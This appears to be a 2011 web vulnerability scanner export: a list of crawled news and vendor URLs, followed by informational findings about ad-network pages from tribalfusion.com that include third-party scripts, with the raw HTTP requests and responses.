http://www.bostonherald.com/intra/hashtag/
http://www.bostonherald.com/jobfind/
http://www.bostonherald.com/jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also
http://www.bostonherald.com/jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also
http://www.bostonherald.com/jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also
http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also
http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also
http://www.bostonherald.com/lottery/
http://www.bostonherald.com/mediacenter/
http://www.bostonherald.com/mediacenter/index.php
http://www.bostonherald.com/mediacenter/index.php
http://www.bostonherald.com/mediacenter/video.php
http://www.bostonherald.com/mediacenter/video.php
http://www.bostonherald.com/mediacenter/video.php
http://www.bostonherald.com/mobile/info.bg
http://www.bostonherald.com/ne_snow/
http://www.bostonherald.com/news/
http://www.bostonherald.com/news/columnists/
http://www.bostonherald.com/news/columnists/view.bg
http://www.bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also
http://www.bostonherald.com/news/international/
http://www.bostonherald.com/news/international/africa/view.bg
http://www.bostonherald.com/news/national/
http://www.bostonherald.com/news/national/general/view.bg
http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5
http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5
http://www.bostonherald.com/news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/
http://www.bostonherald.com/news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/
http://www.bostonherald.com/news/obituaries/
http://www.bostonherald.com/news/offbeat/
http://www.bostonherald.com/news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent
http://www.bostonherald.com/news/opinion/
http://www.bostonherald.com/news/police_logs/
http://www.bostonherald.com/news/politics/
http://www.bostonherald.com/news/politics/view.bg
http://www.bostonherald.com/news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/
http://www.bostonherald.com/news/politics/view/20110127mass_house_members_getting_committee_assignments/
http://www.bostonherald.com/news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/
http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1
http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1
http://www.bostonherald.com/news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent
http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0
http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0
http://www.bostonherald.com/news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/
http://www.bostonherald.com/news/regional/
http://www.bostonherald.com/news/regional/gardner_heist/
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/
http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4
http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
http://www.bostonherald.com/news/us_politics/
http://www.bostonherald.com/photobox/index.bg
http://www.bostonherald.com/projects/boston_pensions/
http://www.bostonherald.com/projects/bra/
http://www.bostonherald.com/projects/buybacks/
http://www.bostonherald.com/projects/consultants/
http://www.bostonherald.com/projects/edic/
http://www.bostonherald.com/projects/lawyer_pay/
http://www.bostonherald.com/projects/mcas2009
http://www.bostonherald.com/projects/mta2008/
http://www.bostonherald.com/projects/non_profit/
http://www.bostonherald.com/projects/payroll/brockton/
http://www.bostonherald.com/projects/payroll/cambridge/
http://www.bostonherald.com/projects/payroll/cca/
http://www.bostonherald.com/projects/payroll/mass_pike/
http://www.bostonherald.com/projects/payroll/quasi_state/
http://www.bostonherald.com/projects/payroll/quincy/
http://www.bostonherald.com/projects/payroll/springfield/
http://www.bostonherald.com/projects/payroll/suffolk/
http://www.bostonherald.com/projects/payroll/worcester/
http://www.bostonherald.com/projects/your_tax_dollars.bg
http://www.bostonherald.com/search/
http://www.bostonherald.com/shopping/half_price_boston/
http://www.bostonherald.com/sports/
http://www.bostonherald.com/sports/baseball/
http://www.bostonherald.com/sports/basketball/
http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also
http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also
http://www.bostonherald.com/sports/college/
http://www.bostonherald.com/sports/columnists/
http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also
http://www.bostonherald.com/sports/football/
http://www.bostonherald.com/sports/football/patriot_moments/
http://www.bostonherald.com/sports/football/patriots/view.bg
http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7
http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7
http://www.bostonherald.com/sports/golf/
http://www.bostonherald.com/sports/hockey/
http://www.bostonherald.com/sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also
http://www.bostonherald.com/sports/other_sports/
http://www.bostonherald.com/sports/soccer/
http://www.bostonherald.com/store/
http://www.bostonherald.com/track/
http://www.bostonherald.com/track/celebrity/
http://www.bostonherald.com/track/celebrity/view.bg
http://www.bostonherald.com/track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also
http://www.bostonherald.com/track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also
http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also
http://www.bostonherald.com/track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also
http://www.bostonherald.com/track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet
http://www.bostonherald.com/track/inside_track/
http://www.bostonherald.com/track/inside_track/view.bg
http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also
http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3
http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3
http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also
http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also
http://www.bostonherald.com/track/star_tracks/
http://www.bostonherald.com/track/star_tracks/view.bg
http://www.bostonherald.com/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also
http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also
http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet
http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also
http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet
http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also
http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet
http://www.bostonherald.com/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also
http://www.bostonherald.com/track/star_tracks/view/20110128startracks/srvc=home&position=also
http://www.bostonherald.com/track/track_gals_tv/
http://www.bostonherald.com/users/register
http://www.bostonherald.com/users/register/
http://www.bostonherald.com/weather/
http://www.cbs6albany.com/
http://www.cbs6albany.com/albany-community/
http://www.cbs6albany.com/albany-tv-programming/
http://www.cbs6albany.com/albany-weather-forecast
http://www.cbs6albany.com/common/archives/
http://www.cbs6albany.com/common/archives/
http://www.cbs6albany.com/common/archives/
http://www.cbs6albany.com/search/
http://www.cbs6albany.com/sections/abouthdtv/
http://www.cbs6albany.com/sections/articles-map/
http://www.cbs6albany.com/sections/contactus/
http://www.cbs6albany.com/sections/contactus/newstips/
http://www.cbs6albany.com/sections/employmentopportunities/
http://www.cbs6albany.com/sections/jobsonline/
http://www.cbs6albany.com/sections/live-cameras/
http://www.cbs6albany.com/sections/local-news/
http://www.cbs6albany.com/sections/local-sports/
http://www.cbs6albany.com/sections/production-department/
http://www.cbs6albany.com/sections/publicfile/
http://www.cbs6albany.com/sections/rss/
http://www.cbs6albany.com/sections/sales/
http://www.cbs6albany.com/sections/satellitewaivers/
http://www.cbs6albany.com/sections/schoolclosures/
http://www.cbs6albany.com/sections/schoolwatch/
http://www.cbs6albany.com/sections/sitemap/
http://www.cbs6albany.com/sections/sp-alerts/
http://www.cbs6albany.com/sections/thirdParty/iframe_footer/
http://www.cbs6albany.com/sections/thirdParty/iframe_header/
http://www.cbs6albany.com/sections/traffic-events/
http://www.cbs6albany.com/sections/traffic/
http://www.cbs6albany.com/sections/tvlistings/
http://www.cbs6albany.com/sections/videocopies/
http://www.cbs6albany.com/sections/weather/7day/
http://www.cbs6albany.com/sections/web-links/
http://www.cbs6albany.com/sections/wrgb-talent/
http://www.cbs6albany.com/sections/you-paid-for-it/
http://www.collegeanduniversity.net/herald/
http://www.moxiesoft.com/
http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx
http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx
http://www.moxiesoft.com/tal_about/contact.aspx
http://www.moxiesoft.com/tal_news/press_release.aspx
http://www.moxiesoft.com/tal_news/webinars_recorded.aspx
http://www.moxiesoft.com/tal_products/answer.aspx
http://www.moxiesoft.com/tal_products/chat.aspx
http://www.moxiesoft.com/tal_products/cobrowse.aspx
http://www.moxiesoft.com/tal_products/customer-spaces.aspx
http://www.moxiesoft.com/tal_products/email.aspx
http://www.moxiesoft.com/tal_products/employee-spaces.aspx
http://www.moxiesoft.com/tal_products/knowledgebase.aspx
http://www.moxiesoft.com/tal_products/phone.aspx
http://www.moxiesoft.com/tal_products/proactive_chat.aspx
http://www.moxiesoft.com/tal_products/request_demo.aspx
http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1
http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm
http://www.paperg.com/
http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html
https://www.paperg.com/post.php
http://www.parker-software.com/forum/
http://www.parkersoft.co.uk/
http://www.parkersoft.co.uk/about.aspx
http://www.parkersoft.co.uk/client.aspx
http://www.parkersoft.co.uk/contact.aspx
http://www.parkersoft.co.uk/email2db.aspx
http://www.parkersoft.co.uk/partners.aspx
http://www.parkersoft.co.uk/privacy.aspx
http://www.parkersoft.co.uk/products.aspx
http://www.parkersoft.co.uk/smsserver.aspx
http://www.parkersoft.co.uk/subscribe.aspx
http://www.parkersoft.co.uk/supnotes.aspx
http://www.parkersoft.co.uk/terms.aspx
http://www.parkersoft.co.uk/whoson.aspx
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.soundingsonline.com/
http://www.soundingsonline.com/about-us
http://www.soundingsonline.com/advertise
http://www.soundingsonline.com/archives
http://www.soundingsonline.com/boat-shop
http://www.soundingsonline.com/boat-shop/know-how
http://www.soundingsonline.com/boat-shop/new-boats
http://www.soundingsonline.com/boat-shop/new-gear
http://www.soundingsonline.com/boat-shop/on-powerboats
http://www.soundingsonline.com/boat-shop/on-sailboats
http://www.soundingsonline.com/boat-shop/q-a-a
http://www.soundingsonline.com/boat-shop/sea-savvy
http://www.soundingsonline.com/boat-shop/tech-talk
http://www.soundingsonline.com/boat-shop/used-boat-review
http://www.soundingsonline.com/calendar
http://www.soundingsonline.com/career-opportunities
http://www.soundingsonline.com/columns-blogs
http://www.soundingsonline.com/columns-blogs/bay-tripper
http://www.soundingsonline.com/columns-blogs/books
http://www.soundingsonline.com/columns-blogs/new-england-fishing
http://www.soundingsonline.com/columns-blogs/under-way
http://www.soundingsonline.com/component/chronocontact/
http://www.soundingsonline.com/component/content/article/237622
http://www.soundingsonline.com/component/yvcomment/
http://www.soundingsonline.com/contact-us
http://www.soundingsonline.com/features
http://www.soundingsonline.com/features/destinations
http://www.soundingsonline.com/features/in-depth
http://www.soundingsonline.com/features/justyesterday
http://www.soundingsonline.com/features/lifestyle
http://www.soundingsonline.com/features/profiles
http://www.soundingsonline.com/features/technical
http://www.soundingsonline.com/features/type-of-boat
http://www.soundingsonline.com/index.php
http://www.soundingsonline.com/more/digital-publications
http://www.soundingsonline.com/more/the-masters-series
http://www.soundingsonline.com/news
http://www.soundingsonline.com/news/coastwise
http://www.soundingsonline.com/news/dispatches
http://www.soundingsonline.com/news/home-waters
http://www.soundingsonline.com/news/mishaps-a-rescues
http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan
http://www.soundingsonline.com/news/mishaps-a-rescues/index.php
http://www.soundingsonline.com/news/sailing
http://www.soundingsonline.com/news/todays-top-stories
http://www.soundingsonline.com/resources
http://www.soundingsonline.com/site-map
http://www.soundingsonline.com/subscription-services
http://www.soundingsonline.com/subscription-services/preview-current-issue
http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.zvents.com/
http://www.zvents.com/albany-ny/events

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aGmNQCREnQQcFoQWYM1WvnW6Yx3G310UFIUAXn2PUbPmJD2HZbt0HvZandIy3mBQ3GQ6UcYjWsbeSAYuUWnPTrMR2U2tUqrxVaJbSTQLQcfCQUmoPHvcVGbU5FyrmWeOXqqm2W3FPsBG2mBZaptEmVdj9YFYb1UYXs21w50/

Request

GET /p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ahnkZbHm5abw6yuoZbUkT4fqUDUD2sYQZdDZaWW5gcMxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4syZcjG8Zbft2iGhneSok3ZaDIZdclXCdIhsscZdmH5YsnPfW8trZcsA79tQACk3NTkV13GtqIcPaqt5eZa6M8CABjvZaxZdmQA4c0baAtET1GltZbo81FoGCIhgtCZasZdMN2Jjq106mWnmilvx5UBLq5opOrZbZcOFaY55V1fiX6YxFuxKCmyoNYTDMRkSagDd2m8SCdgsicJZdExmlx1v8BkXZcnSVO7wwTQlALimTf1ubR4BfjMSAZaZblvDXi4cJyPKOlZctjiZc6vBUFwUVAJ5ZdBUubZc14m7BkLGGox6JFEyBTa7rcBXF5kT5Us9stePYaiDRKe6lFIGtKQZaSv3ZbYg87VtNTF9wDkwTVZcSj7

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 336

<script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aGmNQCREnQQcFoQWYM1WvnW6Yx3G310UFIUAXn2PUbPmJD2HZbt0HvZandIy3mBQ3GQ6UcYjWsbeSAYuUWnPTrMR2U2tUqrxVaJbSTQLQcfCQUmoPHvcVGbU5FyrmWeOXqqm2W3FPsBG2mBZaptEmVdj9YFYb1UYXs21w50/"></script>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 336

<script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/"></script>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/

Request

GET /p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aFniZbdrZcAQv7qErk3wtMfZbU9XEWrMBHByiWNhZdNIKLQZbE7ZaE3B1VnZdTCA03CbU6dsgAYmGSG015YSSunPstHruMTZcelEZciG0RUMnkK5eM3IIcZaVRn0Zd5ZcseGlwZdLdJTjiNae7RFLCRUBqLtVXDfl2kgYPp2iKWvPcOdu0JWJ7oiUjYELprSghdIvVZbEJeWP7GNXnu4PSUSZafIMsjXZbr2ZctI4FCt8eQNGZa42ZcQNwxOKIw43K3QOvTZdGtFN7OVoeYFg2jEF0KYJlBdaonIUolnZbAroZaE5PT5dcvcjXPATcqSXEcqZaontQbZb575eiRLTBnHoBySsjVm8WmLhG4P1Mgmy0KZdPZdRH3aHq3CJTZaHNsd5fQFfAO8FPNKZc6E9QBBZalQ6jQqTXEgKxloEVmt7bLywrJnb5a3c45Uncdkj2b2EYQeuPrVCSlhtIOueIEhgi8qE4vZap6XlnE5XqC63dxf8eP8ZaXbaV8njVgaRWqXJXEIXVg

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 346

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/">
</script>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a4mNYDprnEXG7TXcM30cvumTFV2bZbRTFvFVmU5REM2QsvqQdUM1dBqV6nM4cB3YbrZcVAyw4AU8QPrG3W3n1dBKmd6o4PBP5GngTGJbVsniPPnmUWFWUbFP3ripVanoTTYaSa3LSGjZdPbuxRtYdVVfP4FTtmWqOTHqIxq6DWP/

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 343

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a4mNYDprnEXG7TXcM30cvumTFV2bZbRTFvFVmU5REM2QsvqQdUM1dBqV6nM4cB3YbrZcVAyw4AU8QPrG3W3n1dBKmd6o4PBP5GngTGJbVsniPPnmUWFWUbFP3ripVanoTTYaSa3LSGjZdPbuxRtYdVVfP4FTtmWqOTHqIxq6DWP/">
</script>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/

Request

GET /p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
